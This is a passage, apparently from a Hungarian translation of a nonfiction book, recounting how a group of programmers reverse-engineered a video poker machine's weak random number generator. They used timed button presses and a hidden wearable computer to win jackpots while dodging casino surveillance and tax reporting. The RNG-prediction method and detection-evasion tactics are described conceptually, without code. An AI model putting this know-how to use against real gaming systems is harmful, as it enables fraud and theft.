kifizetéseket állított be. Más csapatok ezt csinálták, azonban ehhez a
kaszinó egyik alkalmazottjának együttműködésére lett volna szükség;
ráadásul nem is akárkit, hanem a nyerőautomatát kezelő technikai
személyzetet kellett volna megkörnyékezni. Alex és cimborái számára
„a ROM-ok kicserélése olyan lett volna, mint egy idős asszonyt tarkón
csapni és elvenni a pénztárcáját”. Úgy gondolták, hogy csak akkor
vágnak bele az egészbe, ha programozási ismereteiket és szellemi
kapacitásukat állíthatják kihívás elé. Ráadásul nem voltak kifinomult
social engineering szakértők; informatikusok voltak, akik nem tudták,
hogyan kell egy kaszinó alkalmazottját megkörnyékezni és rávenni
arra, hogy szálljon be egy olyan buliba, amelynek során olyan pénzt
visznek haza, ami nem az övék. De hogyan kezdjenek hozzá a
probléma megoldásához? Alex erről így mesélt:
Azon gondolkodtunk, hogy vajon előre lehet-e jelezni a kártyák
sorrendjét. Vagy találhatunk-e egy hátsó ajtót (kiskapu, amely utólagos
jogosulatlan hozzáférést enged a programhoz), amit valamilyen
programozó saját céljaira rakott a kódba? Minden programot
programozók írnak, és a programozók csintalan teremtmények. Arra
gondoltunk, hogy valahogy rábukkanhatunk egy hátsó ajtóra, például
olyan gombokra, amelyek megváltoztatják az esélyeket, vagy egy
egyszerű programozói hibára, amit kihasználhatnánk.
Alex olvasta Thomas Bass a The Eudaemonic Pie (Az eudémonista
szarka – Penguin, 1992) című könyvhét, amely arról szól, hogy
informatikusok és fizikusok egy csapata saját találmányával, egy
körülbelül egy cigarettásdoboz méretű, ruhán viselhető számítógéppel
hogyan győzte le a rulettet Las Vegas-ban. A számítógépet arra
használták, hogy a játék kimenetelét megjósolják. A csapat egyik tagja
a gombokat nyomogatva a rulettkerék sebességét és a golyó pörgését
vitte be, amire a számítógép a csapat egy másik tagjának a fülében levő
nagyothalló készüléknek küldött hangjelzéseket, aki értelmezte ezeket,
és a megfelelő tétet rakta meg. Egy halom pénzzel távozhattak volna,
de nem tették. Alex értelmezése szerint: – A tervük nagy potenciállal
kecsegtetett, de a fáradságos és megbízhatatlan technológia mindent
aláásott. Ráadásul túl sok résztvevő volt a buliban, az ő viselkedésük és
a személyes kapcsolataik mind meghatározták az egész kimenetelét.
Eltökéltük, hogy mi nem követjük el a hibáikat.
Alex rájött, hogy könnyebb egy számítógépen alapuló játékot
legyőzni, „mivel a számítógép teljes mértékben determinista” – a
kimenetel azon múlik, hogy mi volt korábban, vagy hogy egy
programozói mondást idézzünk, jó bemenő adat, jó kimenő adat. (Az
eredeti kifejezés negatív szempontból közelít a kérdéshez: szemét be,
szemét ki.)
Ez pontosan az ő utcája volt. Tizenéves korában Alex egy bandában
zenélt, és arról álmodozott, hogy rocksztár lesz, majd amikor ez nem
jött be, a matematikai tanulmányok felé sodródott. Volt érzéke a
matekhoz, és bár soha nem törődött túl sokat az iskolával (a főiskoláról
is kimaradt), addig azért eljutott, hogy elfogadható szinten tudott a
témával foglalkozni.
Mivel rájött, hogy szükség van egy kis kutatásra, elutazott
Washington DC-be, és a Szabadalmi Hivatal olvasótermében múlatta
idejét. – Arra gondoltam, hogy valaki talán lesz olyan bolond, hogy a
nyerőautomata szabadalmába a teljes kódot beírja. – És bármilyen
hihetetlen, igaza volt. – Akkoriban a szabadalmat kérvényezők úgy
védték találmányukat, hogy több oldalnyi kódot „belenyomtak” a
szabadalomba, hiszen a kód részletesen leírta a találmányukat, azonban
nem volt túlzottan felhasználóbarát. Mikrofilmet készítettem a kódról,
majd beszkenneltem a hexadecimális számjegyekből álló kód érdekes
részeit; ezt még használható formába kellett bontani.
A kód elemzésekor a csapat talált ugyan néhány érdekes titkot,
azonban rájöttek, hogy csak akkor lesznek képesek igazi előrelépésre,
ha a kezükbe vehetnek egy olyan típusú gépet, amit meg akarnak
hackelni, hogy saját maguk láthassák a kódot.
A fiúk csapatként nagyon jól illettek egymáshoz. Mike nem csak egy
hozzáértő programozó volt, a másik háromnál erősebb volt a
hardvertervezésben is. Marco, szintén egy profi programozó, kelet-
európai bevándorló volt, aki úgy nézett ki, mint egy tinédzser. Ennek
ellenére vakmerő, mindenhez önbizalommal, „ki ha én nem”
hozzáállással közelítő srác volt. Alex programozásban tűnt ki a többiek
közül, olyan valaki volt, aki értett a titkosíráshoz, vagyis ahhoz, amire
szükségük volt. Larry nem annyira volt otthon a programozásban, és
egy motoros balesete miatt nem igazán tudott utazni, de remek
szervező volt, aki kézben tartotta a projektet, és mindenki arra
összpontosíthatott, amire az adott időben és adott helyen kellett.
A kezdeti kutatásuk után Alex szinte megfeledkezett a projektről.
Marco azonban nem tágított az ötlettől. Azt mondogatta, hogy „nem
nagy ügy, tizenhárom államban legálisan lehet gépeket vásárolni”.
Végül sikerült a fiúkat rábeszélnie, hogy egy próbálkozást megér a
dolog. – Végül is jól kitaláltuk az egészet, nem? – Mindenki bedobta az
utazáshoz és az egy gép megvásárlásához szükséges pénzt. Úticéljuk
ismét Vegas volt – ez alkalommal azonban saját költségen és teljesen
más céllal.
Ahogy Alex elmondta; – Nyerőautomata vásárlásához
tulajdonképpen csak be kell sétálni és fel kell mutatni egy olyan
állambeli személyi igazolványt, ahol ezeket a gépeket legálisan lehet
birtokolni. Ha egy megfelelő államból való jogosítvány van a
zsebedben semmit nem kérdeznek. – Az egyik srác kapcsolatban állt
egy nevadai lakossal. – Valakinek a barátnőjének a nagybátyja vagy
valami ilyesmi volt, és Vegasban lakott.
Mike-ot választották ki arra, hogy beszéljen ezzel a férfivel, mivel „ő
olyan üzleti megjelenésű, reprezentatív fajta.” Az mondtuk, hogy
„illegális szerencsejátékra fogjuk használni a gépet. Úgy, ahogy
fegyverek esetén szokás”, magyarázta Alex. Rengeteg gép kerül a
szürkepiacra, vagyis az elfogadott csatornákon kívüli értékesítés során
olyan helyekre, mint például a klubok. Ennek ellenére Mike furcsának
találta, hogy „pontosan olyan darabokat vásárolhatunk, mint
amilyeneket a kaszinó parkettjén használnak”.
Mike kifizette az 1500 dolcsit a japán gyártmányú gépért. Ketten
bevágtuk a kocsiba. Úgy vezettünk hazáig, mintha egy bébi lett volna a
hátsó ülésen.

A hackelés kidolgozása

Mike, Alex és Marco felcipelte a gépet egy ház második emeletére,


ahol használatra megkaptak egy üresen álló hálószobát. Az élmény
izgalmára Alex sokáig úgy fog emlékezni, mint életének egyik
legbizsergetőbb pillanatára.
Felnyitottuk, kivettük a memóriát, megnéztük, milyen processzora
van. Én döntöttem úgy, hogy ezt a japán gépet szerezzük meg, mert ez
úgy nézett ki, mint a nagy márkák egyikének a koppintása. Arra
gondoltam, hogy a tervezők talán nagyobb nyomás alatt dolgoztak,
esetleg kissé lustábbak vagy felületesebbek lehettek.
Kiderült, hogy igazam van. Egy 6809-et (chip) használtak, amely az
Apple II vagy az Atari gépekben levő6502-eshez hasonló. Nyolcbites
chip volt 64K memóriával. Assembly programozó voltam, így mindez
ismerős volt nekem.
Az Alex által választott gép akkoriban már több mint 10 éve a
piacon volt. Amikor egy kaszinó új tervezésű gépet akar vásárolni, a
Las Vegas-i Szerencsejáték Felügyeletnek meg kell vizsgálnia a gép
programozását, és ellenőriznie kell, hogy a kifizetések méltányosak-e.
Az új design jóváhagyása hosszadalmas folyamat, ezért a kaszinók
hosszabb ideig használják a régi gépeket, mint ahogy azt gondolnánk.
A csapatnak a régebbi gép azt jelentette, hogy nagy valószínűséggel a
benne használt technológia sem túl naprakész, így reményeik szerint
kevésbé kifinomult és könnyebben feltörhető.
A chipből letöltött számítógépes kód bináris formátumban volt, az 1-
esek és a 0-k sorozata a számítógépes utasítások legalapvetőbb szintje.
Ahhoz, hogy ezt olyan formátumba fordítsák, amelyet használni
tudnak, először kódvisszafejtést, idegen kifejezéssel reverse
engineeringet kellett végrehajtaniuk. Ez olyan módszer, amellyel egy
programozó kiderítheti, hogy egy létező terméket hogyan készítettek;
jelen esetben ez a gépi nyelvről egy olyan formátumba való
konvertálást jelentette, amit a fiúk megértenek és amivel tudnak
dolgozni.
Alexnek a kód lefordításához egy fordítóprogramra volt szüksége.
Nem akarták azzal beszennyezni a kezüket, hogy megpróbálnak egy
megfelelő szoftvert vásárolni – az olyan lett volna, mintha elmennének
a könyvtárba, és kivennének egy könyvet a bombák készítéséről. A
fiúk megírták a saját disassembler programjukat, ami – ahogy Alex
fogalmazott – „nem volt gyerekjáték, de jól szórakoztunk és ezért
viszonylag könnyen ment”.
Amikor a pókerautomatából származó kódot átfuttatták az új
fordítóprogramon, a három fiú nekiült, hogy megnézzék, mire jutottak.
Egy képzett programozó általában könnyen megtalálja a program azon
részeit, amelyekre összpontosítani kíván. Ez azért van, mert a kódot
eredetileg író személy „útjelzőket” helyez el a kódba, jegyzeteket,
magyarázatokat és megjegyzéseket, amelyek az egyes szakaszok
működését magyarázzák el. Ezek a könyvek fejezeteihez,
alfejezeteihez és egyéb alcímeihez hasonlítanak.
Amikor egy programot a gép által olvasható formátumra fordítanak,
ezeket a közlekedési táblákat figyelmen kívűl hagyják – a
számítógépnek vagy a processzornak nincsen szüksége rájuk, így a
visszafejtett kód nem tartalmazza ezeket a hasznos magyarázatokat; ha
folytatni kívánjuk a „útjelzős” metaforát, a visszafejtett kód olyan, mint
egy térkép helység–, autópálya– vagy éppen utcanevek nélkül.
Alaposan átvizsgálták a több képernyőnyi kódot, választ keresve az
alapvető kérdéseikre: Mi a logikája? Hogyan keveri a kártyákat?
Hogyan választja ki a kicserélendő kártyákat? A fiúk elsősorban mégis
a véletlen szám generátor (random number generátor – RNG) kódját
keresték. Alex azon gyanúja, amely szerint a kódot író japán
programozók esetleg a véletlen szám generátorban hibákat okozó
egyszerűsítéseket alkalmaztak, igaznak bizonyult.

A kód átírása
Alex nagyon büszkén mesélt erről: – Programozók voltunk, és jók
voltunk abban, amit csináltunk. Rájöttünk, hogy a kódban levő számok
hogyan változnak a gépen kártyákká, majd írtunk egy rövid C-kódot,
amely ugyanezt tette – mondta a C nevű programnyelvre utalva.
Motiváltak voltunk, állandóan rengeteget dolgoztunk. Azt
mondanám, hogy körülbelül két vagy három hétig tartott, amíg
eljutottunk addig a pontig, hogy egész jól tudtuk, hogy pontosan mi
történik a kódban.
Megnézed, megpróbálod kitalálni, megírod az új kódot, beírod a
ROM-ba (a számítógép chipjébe), visszarakod a gépbe, és megnézed,
hogy mi történik. Például olyan rutinokat irtunk, amelyek
hexadecimális számokat jelentettek meg a képernyőn a kártyák tetején.
Szóval nagyjából betekintést nyertünk abba, hogy a kód hogyan kezeli
a kártyákat.
Ez volt a trial-error módszer (gyakorlatilag a próbálkozás) és a
felülről lefele irányuló elemzés kombinációja; a kód egész gyorsan
kezdett értelmessé válni. Végül teljesen megértettük azt a
mechanizmust, ahogy a számítógép belsejében a számok a képernyőn
megjelenőkártyákká változtak.
Nagyon reméltük, hogy a véletlen szám generátor viszonylag
egyszerű lesz. És ebben az esetben az is volt. Ne feledjük, hogy a 90-es
évek elején jártunk. Kis kutatást végeztem, és kiderült, hogy valami
olyasmin alapult az egész, amiről Donald Knuth írt a 60-as években.
Ezek a japánok semmit sem találtak ki; egyszerűen vették a Monte
Carlo-módszerről rendelkezésre álló kutatásokat és hasonló dolgokat,
majd berakták a kódjukba.
Kitaláltuk, hogy pontosan milyen algoritmust használtak a kártyák
véletlen előállítására; lineáris visszaléptetőregiszternek hívják ezt a
módszert, egy elég jó véletlen szám generátor.
Azonban hamarosan észrevették, hogy a véletlen szám generátornak
van egy végzetes hibája, amely nagyban megkönnyítette a dolgukat.
Mike elmagyarázta, hogy „egy viszonylag egyszerű 32-bites RNG volt,
így a crackelés számítási komplexitása elérhető közelségbe került,
néhány jó optimalizálás után majdnem triviálissá vált”.
A generált számok nem voltak igazi véletlen számok. Alex szerint
ennek is megvan a megfelelő indoka:
Ha igazán véletlen számok lennének, nem tudnák beállítani a nyerési
esélyt. Nem tudnák ellenőrizni, hogy valójában milyenek az esélyek.
Egyes gépek adtak szekvenciális royal flush-öket (olyan, mint a royal
flush, csak a leosztott lapok ráadásul a megfelelősorrendben jelennek
meg a képernyőn). Ennek nem kellene megtörténnie. Ezért a
programozók szeretnék, ha rendelkezésükre állnának a
megfelelőstatisztikák, különben úgy érzik, hogy nem tudják
ellenőrzésük alatt tartani a játékot.
Egy másik dolog, amire a gép tervezésekor nem gondoltak a
programozók, az volt, hogy tulajdonképpen nem csak egy véletlen szám
generátorra szükség. Statisztikai értelemben minden osztásnál tíz
kártyalap van – az eredetileg megmutatott öt, illetve egy-egy kártya
ehhez az öthöz, amelyet a játékos a lap dobásakor megkap. Kiderült,
hogy a gép korai változatai tulajdonképpen a véletlen szám
generátorban levőtíz egymást követővéletlen számból vették ezt a tíz
kártyát.
Alex és társai megértették, hogy a gép korai generációinak
programozási utasításai nem voltak eléggé átgondoltak. E hibák miatt
arra is rájöttek, hogy egy viszonylag egyszerű, ám elegánsan okos
algoritmus megírásával képesek lehetnek legyőzni a gépet.
Alex látta, hogy a trükk annyi, hogy el kell kezdeni játszani, meg
kell nézni, hogy milyen kártyákat mutat meg a gép, és ezeket az
adatokat be kell táplálni a kártyákat azonosítani képes, otthon levő
számítógépükbe. Az algoritmusuk kiszámítja, hogy a véletlen szám
generátor hol van, és hány számon kell keresztülmennie addig, amíg
készen áll arra, hogy a kívánt leosztást, a royal flush-t jelenítse meg.
A tesztgépünknél voltunk, a kis programunkat futtattuk, amely
pontosan megmutatta a soron következőkártyákat. Piszok izgatottak
lettünk.
Alex annak tulajdonítja ezt az izgatottságot, hogy „tudod, hogy
okosabb vagy valakiknél és meg tudod verni őket. És jelen esetben ez
pénzt, sok pénzt jelenthetett nekünk.”
Elmentek és olyan Casio karórákat vásároltak, amelyek
visszaszámláló funkciója tizedmásodpercekre is beállítható volt;
hármat vettek belőle, hogy majdan a kaszinóban minden srácnak
legyen egy; Larry majd hátramarad a számítógépet kezelni.
Készen álltak arra, hogy elkezdjék tesztelni a módszert. A csapat
egyik tagja elkezd játszani, és bemondja a kezében levő leosztást –
mind az öt kártya számát és színét. Larry beviszi az adatokat a saját
számítógépébe; ez egy márka nélküli, ám számítógép-mániákusok
körében igen népszerű típus volt, amely kiválóan megfelelt a célnak,
hiszen sokkal gyorsabb chipje volt, mint a japán pókerautomatának.
Csupán pillanatokra volt szüksége, hogy kiszámolja a Casio
visszaszámlálókba beállítandó időt.
Amikor a visszaszámláló leállt, az automatánál levő srác megnyomta
a Play gombot. Ezt azonban pontosan, a másodperc tört részén belül
meg kellett tenni. Ahogy Alex elmesélte, ezt nem is volt olyan nehéz
megvalósítani, mint gondolnánk:
Közülünk ketten is zenészek voltak. Ha zenélsz és elfogadható
ritmusérzéked van, plusz-mínusz öt ezredmásodpercen belül meg tudsz
nyomni egy gombot.
Ha minden úgy működik, ahogy gondolták, a gép az áhított royal
flush-t jeleníti meg. Kipróbálták a saját gépükön, és addig gyakoroltak,
amíg egészen jó százalékban megütötték a royal flush-t.
Az elmúlt hónapokban – ahogy Mike fogalmazott – „visszafejtettük
egy gép működését, megtanultuk, hogy a véletlen számok hogyan
változnak a képernyőn kártyákká, pontosan mikor és milyen gyorsan
ismétlődik a RNG, megismertük a gép összes sajátosságát, és
kifejlesztettünk egy olyan programot, amely ezen változókat
figyelembe véve tudatja velünk, hogy a gép egy adott időpontban
milyen állapotában van, így nagy pontossággal megjósolhatjuk az RNG
pontos iterációját a következő órákra vagy akár napokra is”.
Legyőzték a gépet – saját rabszolgájukká tették. Válaszoltak a
szellemi kihívásra, és sikerrel jártak. A tudás gazdaggá tehette őket. Jó
szórakozás volt erről álmodni. Vajon sikerült jól kigondolt tervüket a
kaszinók dzsungelében megvalósítani?

Visszatérés a kaszinókba – ez alkalommal játszani

Egy dolog a privát, biztonságos területen levő gépünkkel piszmogni.


Ám próbáljunk meg egy nyüzsgő kaszinó közepébe beülni és ellopni a
pénzt – az egy teljesen másik történet, amihez acélidegekre van
szükség.
A lányok úgy gondolták, hogy az utazás jó szórakozás lesz. A srácok
domborodó szoknyákra és hivalkodó viselkedésre – szerencsejátékra,
fecsegésre, nevetésre, italok rendelésére – vették rá őket, remélve, hogy
a csinos arcok és testek villogása elvonja a kamerákat bámuló
biztonsági személyzet figyelmét. – Megpróbáltunk mindent, amit csak
lehetett – emlékszik Alex.
Azt remélték, hogy a tömeggel elvegyülve nem fognak feltűnni. –
Ebben Mike volt a legjobb. Olyan kopaszodó típus volt. Ő és a felesége
tipikus játékosnak tűntek.
Alex úgy mesél, mintha mindez tegnap történt volna. Marco és Mike
valószínűleg kissé másként csinálták, Alex esetében azonban így nézett
ki a dolog: Feleségével, Annie-vel először felderítették a kaszinót, és
kiválasztottak egy pókerautomatát. Alexnek nagy pontossággal meg
kellett tudnia a gép ciklusidejét. Az egyik módszerük azt volt, hogy
videokamerát gyömöszöltek egy válltáskába; a kaszinóban
valamelyikük úgy tartotta a táskát, hogy a kamera lencséje a
pókerautomata képernyőjére mutasson, és ekkor elindították a kamerát.
– Néha problémás volt – emlékszik vissza Alex –, hogy pontosan a
kívánt magasságban tartsuk a táskát, miközben úgy kellett tenni,
mintha egyáltalán nem lenne fontos a helyzete. Kerülni akartunk
minden gyanús vagy figyelemfelkeltő mozdulatot. – Mike inkább egy
másik, kevésbé megerőltető módszert kedvelt: – A teremben levő
ismeretlen gép ciklusidejét úgy számoltuk ki, hogy kétszer leolvastuk a
képernyőről a kártyák állását. A két leolvasás között több órának kellett
eltelnie. Arra is figyelni kellett, hogy közben senki ne játsszon a
géppel, mivel az megváltoztatta volna az iteráció ütemét, ez azonban
nem volt nehéz: csak ellenőrizni kellett, hogy a megjelenített kártyák
ugyanazok voltak-e, mint amikor legutoljára a gépnél járt, és általában
ez így volt, mert „a nagy téttel megjátszható gépekkel általában ritkán
játszottak”.
Amikor másodszor olvasta le a megjelenített kártyák állását,
szinkronba hozta a Casio visszaszámlálóját is, majd megtelefonálta a
gép időzítési adatait, illetve a kártyák sorrendjét Larrynek, aki
betáplálta ezeket az otthoni számítógépébe, és lefuttatta a programot.
Ezen adatok alapján a gép megbecsülte a következő royal flush idejét.
– Reméltük, hogy ez csak néhány óra lesz; előfordult azonban, hogy
több nap, ilyenkor az egészet újra kellett kezdeni egy másik géppel,
talán egy másik hotelben. Ennél a pontnál a Casio időzítése legfeljebb
egy perccel lehetett elcsúszva, azonban meglehetősen közel volt.
Alex és Annie, felkészülve arra az esetre, hogy valaki játszik a célba
vett gépen, jóval idő előtt visszamentek a kaszinóba, és más gépeken
játszva múlatták az időt, amíg a játékos el nem ment. Ekkor Alex a
célba vett, Annie pedig a mellette levő géphez ült le. Játszani kezdtek,
és úgy tettek, mint aki nagyon jól szórakozik. Majd, ahogy azt Alex
visszaidézi:
Elkezdtem egy játékot, gondosan a Casio időzítésével összhangban.
Amikor a leosztás feljött, memorizáltam mind az öt kártya színét és
értékét, és addig játszottam, amíg nyolc egymást követőkártya a
fejemben nem volt. Ekkor bólintottam a feleségemnek, jelezve, hogy jó
úton vagyok, és elindultam a kaszinó parkettjétől odébb levő, nem
feltűnőfizetős telefonhoz. Körülbelül nyolc percem volt arra, hogy
odaérjek a telefonhoz, elintézzem, amit el kell intéznem, és visszatérjek
a géphez. A feleségem továbbra is játszott. Ha valaki odajött a
gépemhez, azt mondta neki, hogy a férje ül ott.
Kidolgoztuk a módszert: Larry csipogóját hívtuk, majd a telefon
billentyűzetén begépelve a számokat, tudattuk vele, hogy mik a kártyák,
így nem kellett a kártyákat hangosan kimondanunk – a kaszinó
személyzete az ilyen dolgokra mindig figyel. Larry ismét bevitte a
kártyákat a számítógépébe, és lefuttatta a programunkat.
Ekkor ismét felhívtam. Larry a számítógéphez tartotta a kagylót, és a
gép két hangsorozatot adott. Az elsőnél meg kellett nyomnom a
visszaszámláló Pause gombját, leállítva ezzel a visszaszámlálást A
másodiknál a Pause ismételt megnyomásával újraindítottam a
visszaszámlálót.
Az Alex által megadott kártyák alapján a számítógép pontosan tudta,
hogy hol tart a gép véletlen szám generátora. A számítógép által
kiszámított késleltetéssel Alex beállította a Casio visszaszámlálóját, így
az pontosan abban a pillanatban állt meg, amikor a royal flush készen
állt arra, hogy megjelenjen.
Amikor újraindítottam a visszaszámlálót, visszamentem a géphez.
Amikor a visszaszámláló csipogni kezdett, hogy? „ti-ti-tá” pontosan a
„tá”-nál ismét megnyomtam a gépen a Play gombot.
Először, ha jól emlékszem, 35 000 dollárt nyertem.
Eljutottunk arra a szintre, hogy 30 vagy 40 százalékban nyertünk,
hiszen minden nagyon jól ki volt találva. Csak akkor nem sikerült,
amikor nem kaptuk el az időzítést.
Alex számára az első nyerés „nagyon izgalmas, de egyúttal ijesztő is
volt. A kaszinó felügyelőinek főnöke egy savanyú képű olasz volt.
Biztos voltam benne, hogy furcsán, zavart arckifejezéssel az arcán néz
rám, talán azért, mert állandóan telefonálni jártam. Arra gondoltam,
hogy biztosan felment megnézni a felvételeket.” A feszültség ellenére
„kellemes borzongás volt”. Mike úgy emlékszik, hogy „természetesen
ideges voltam, hogy valaki felfigyelt a különös viselkedésemre, de
valójában senki nem nézett rám furcsán. Úgy kezeltek minket, mintha
tipikus nagy nyeremény nyertesek lennénk – gratuláltak és egy rakás
mindenféle jegyet adtak ajándékba.”
Annyira sikeresek voltak, hogy amiatt kezdtek aggódni: a túl gyakori
nyerés felhívja rájuk a figyelmet. Hamarosan rájöttek, hogy a túl sok
siker furcsa problémájával kell szembenézniük: „Túlságosan feltűnők
voltunk. Hatalmas jackpotokat, több tízezer dollárt nyertünk. Egy royal
flush 1 a 4000-et fizet; egy 5 dolláros gépen az húsz lepedő.”
És a nyeremény csak itt kezdődik. Egyes játékok progresszív
típusúak – a jackpot addig növekszik, amíg valaki meg nem nyeri, és a
sárcok ezt is éppen olyan könnyen meg tudták nyerni.
Egyszer nyertem 45 lepedőt. Kijött egy nagy derékszíjú technikus
fickó – valószínűleg ő volt az, aki körbejárt és javította a gépeket. Volt
egy speciális kulcsa, olyan, amilyen a parkett személyzetének nem volt.
Kinyitotta a gépet, kivette az áramkört, és ott előttem kivette a ROM
chipet. Volt nála egy ROM-olvasó, amellyel összehasonlította a gépből
váló chipet az elzárva tartott masterrel.
Alex megtudta, hogy a ROM ellenőrzése már évek óta bevett eljárás
volt. Azt gyanítja, hogy a kaszinósok egyszer már „megégtek így”, de
rájöttek a trükkre, és a ROM ellenőrzést vezették be ellenlépésként.
Alex állítása elgondolkodtatott, hogy a kaszinók azok miatt a fickók
miatt végzik ezt az ellenőrzést, akikkel a börtönben találkoztam, és
akik ténylegesen kicserélték a firmware-t. Azon csodálkoztam, hogyan
tudták olyan gyorsan megcsinálni, hogy ne kapják el őket. Alex azt
gyanította, hogy social engineering megközelítés volt, megegyeztek a
biztonságiakkal, és lefizettek valakit a kaszinóban. Úgy sejtette, hogy
akár még a mastert is lecserélték, amivel a gép chipjét összehasonlítják.
Alex úgy vélte, hogy a csapatuk által végrehajtott hackelés szépsége
abban rejlett, hogy nem kellett megváltoztatniuk a firmware-t.
Ráadásul úgy gondolta, hogy az ő megközelítésük sokkal nagyobb
kihívás volt.
A csapat nem folytathatta a nyerést ilyen nagyban; a fiúk rájöttek,
hogy „előbb-utóbb valakiben összeáll a kép, és azt mondja, én már
láttam ezt a fickót. Elkezdtünk attól rettegni, hogy el fognak minket
kapni”.
A lebukás folytonosan a szemük előtt lebegő réme mellett adóügyi
problémák is foglalkoztatták a fiúkat; az 1200 dollárt meghaladó
nyeremény esetén a kaszinó köteles azonosítani a nyertest, és a
kifizetésről tájékoztatja az IRS-t (Internal Revenue Service, az USA
adóhivatala). Ahogy Mike elmondta: – Azt gondoltuk, hogy ha a
játékos nem mutatja be a személyi igazolványát, az adókkal csökkentik
a kifizetést, azonban nem akartuk felhívni magunkra a figyelmet azzal,
hogy ezt kipróbáljuk.
Az adófizetés önmagában „nem nagy ügy”, azonban „feljegyzés
születik arról, hogy irdatlan mennyiségű pénzt nyersz, így arról
kezdtünk beszélgetni, hogyan maradhatunk a radar látókörén kívül.”
Egy teljesen új megközelítéssel kellett előállniuk. Rövid tanácskozás
után egy új ötlet kezdett körvonalazódni a fiúkban.

Új megközelítés

Ezúttal két céljuk volt: egy olyan módszert kifejleszteni, amely full,
sor vagy flush esetén is tuti nyerést biztosít, így a kifizetések nem
lennének a feltűnésig hatalmasak. És mindezt valahogy kevésbé
feltűnően, hogy a továbbiakban ne kelljen minden játék előtt a
telefonhoz rohangálniuk.
Mivel a kaszinókban csak korlátozott mennyiségű japán gép volt, a
fiúk ez alkalommal egy szélesebb körben használt, egy amerikai cég
által gyártott típust választottak ki. Az előző géphez hasonló módon
szétszedték ezt is, és azt fedezték fel, hogy az ez által használt véletlen
szám generáló módszer sokkal összetettebb volt: a gép egy helyett két,
egymással kombinálva működő generátort használt. – A programozók
sokkal inkább tisztában voltak a hackelés lehetőségeivel – vonta le
Alex a következtetést.
A négy srác azonban megint észrevette, hogy a programozók döntő
hibát követtek el. – Nyilvánvalóan olvasták valahol, hogy egy második
regiszter hozzáadásával javítható a véletlenszerűség minősége, azonban
rossz módszert választottak. – Az egyes kártyák meghatározásához az
első véletlen szám generátorból kapott számhoz hozzáadták a másikból
kapottat.
A megfelelő módszer az lett volna, hogy a második véletlen szám
generátor minden egyes kártya után új értéket állít elő, vagyis
megváltoztatja az értékét. A programozók nem így állították be; a
második regisztert úgy programozták, hogy csak az egyes leosztások
elején állítson elő egy új értéket, és ezt a számot adták hozzá az első
regiszterből származó, a leosztásban szereplő minden egyes értékhez.
A két regiszter használata Alex számára a „titkosírással kapcsolatos
valamivé” változtatta a kihívást; felismerte, hogy ez az üzenetek
titkosításában használt egyik lépéshez hasonlított. Volt ugyan némi
ismerete a témában, az azonban messze nem volt elegendő ahhoz, hogy
megtalálja a megoldást, így a közeli egyetemi könyvtárat kezdte
látogatni, hogy elmélyülhessen benne.
Ha a programozók kicsit mélyebben beleolvastak volna a titkosító
rendszerekkel foglalkozó könyvekbe, akkor nem követték volna el ezt a
hibát. Ráadásul sokkal módszeresebben jártak volna el a rendszer
olyan, crackeléssel szembeni tesztelésekor, amilyen módon mi feltörtük
azt.
Valószínűleg bármely végző programozó tudna olyan kódot írni,
amit magunknak is meg kellett írnunk, ha megérti, hogy mit kell a
kódnak csinálnia. A legtrükkösebb rész az olyan algoritmusok
kitalálása volt, amelyek elég gyorsan keresnek ahhoz, hogy néhány
másodperc alatt megtudjuk, mi történik a rendszerben; ha logika nélkül
állunk neki, több óráig tartott volna, amíg a programunk eljut a
megoldáshoz.
Elég jó programozók vagyunk, mindannyian ebből élünk, így néhány
nagyon ügyes optimalizáló megoldással rukkoltunk elő. De azt azért
nem mondanám, hogy triviális lett volna a kód megírása.
Emlékszem egy hasonló hibára, amit a (később a Symantec által
felvásárolt) Norton egyik programozója követett el, aki a Diskreet nevű
termékükön dolgozott; ez egy olyan alkalmazás, amely lehetővé tette a
felhasználóknak, hogy titkosított virtuális meghajtókat hozzanak létre.
A fejlesztő véletlenül – vagy talán szándékosan – oly módon
alkalmazott egy algoritmust, hogy az 56 bitről 30 bitre csökkentette a
tikosító kulcs területét. Az amerikai szövetségi kormány adattitkosító
szabványa 56 bites kulcsot használt, amelyet feltörhetetlennek
tartottak, és a Norton azt az érzetet keltette az ügyfeleiben, hogy az
adataik ennek a szabványnak megfelelő védelem alatt állnak. A
programozó hibája miatt a felhasználók adatai 56 bit helyett valójában
csak 30 bittel voltak titkosítva. Egy 30 bites kulcsot brute force
támadással már akkoriban is fel lehetett törni. A termék összes
használója a biztonság hamis illúziójában dolgozott: egy támadó
belátható időn belül megszerezhette a kulcsukat, és hozzáférést
nyerhetett a felhasználók adataihoz. A csapat hasonló hibát vett észre a
gép programjában.
Miközben a fiúk egy olyan számítógépes programon ügyködtek,
amellyel megverhetik az újonnan kiszemelt gépet, egy „nincsen több
rohangálás a telefonhoz” megközelítés kidolgozására sürgették Alexet.
A megoldás a már említett Eudaemonic Pie című könyvből jött: egy
„viselhető” számítógép. Alex a Mike és Marco által egy katalógusban
talált kis alaplapra épített miniatürizált számítógépből álló rendszert
tervezett, amelyhez egy cipőben elférő vezérlő gomb, illetve egy a
napjaink mobiltelefonjaiban levő csendes rezgő szerkezethez hasonló
vibrátor tartozott, így emlegették a rendszert: a saját „számítógép a
zsebben cuccuk”.
– Ügyeskednünk kellett, hogy egy kevés memóriával rendelkező
apró chipen működjön a dolog – mondta Alex. – Csinos kis hardvert
készítettünk, hogy az egész beférjen egy cipőbe és ergonómikus
legyen. (Az ergonómikus ebben a szövegkörnyezetben gondolom, azt
jelentette, hogy elég kicsi ahhoz, hogy sántítás nélkül tudjanak menni a
cipőben!)

Az új támadás

A csapat megkezdte az új módszer tesztelését, amely némileg


idegőrlőnek bizonyult. Igaz, hogy most már felhagyhattak a minden
egyes nyerés előtt a telefonhoz rohangálás kissé gyanús módszerével.
A nyitóest azonban még a hátuk mögött hagyott próbákkal együtt is azt
jelentette, hogy szép számú, mindig mindent gyanúsnak vélő biztonsági
emberekből álló közönség előtt kellett játszaniuk.
A programot ez alkalommal úgy alakították ki, hogy hosszabb ideig
ülhettek egy gép előtt, és kisebb, kevésbé gyanús nyeremények sorát
vihették haza. Alex és Mike – miközben elmesélik, hogyan működött a
rendszer – felelevenítik a feszültséget, amit éreztek;
Alex: – Én általában a zsebembe tettem a kis tranzisztornak
tűnőszámítógépet. Egy vezeték húzódott a zokni alatt a cipőben
levőkapcsolóhoz.
Mike: – Én a bokámhoz szíjaztam az enyémet. Apró breadboard
(hardverlaborokban használt anyag, áramkörök tervezése során
használt nem végleges modellhez) darabokból készítettük a
kapcsolókat. A darabok körülbelül 6 négyzetcentiméteresek voltak, és
egy miniatűr gombot tartalmaztak. Egy kis darab rugalmas anyagra
